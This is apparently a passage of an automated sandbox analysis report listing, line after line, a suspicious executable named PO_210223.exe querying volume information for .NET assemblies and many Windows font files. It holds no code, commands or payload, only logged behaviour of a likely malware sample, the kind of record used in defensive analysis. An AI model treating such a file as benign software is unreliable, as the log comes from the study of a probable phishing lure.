            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
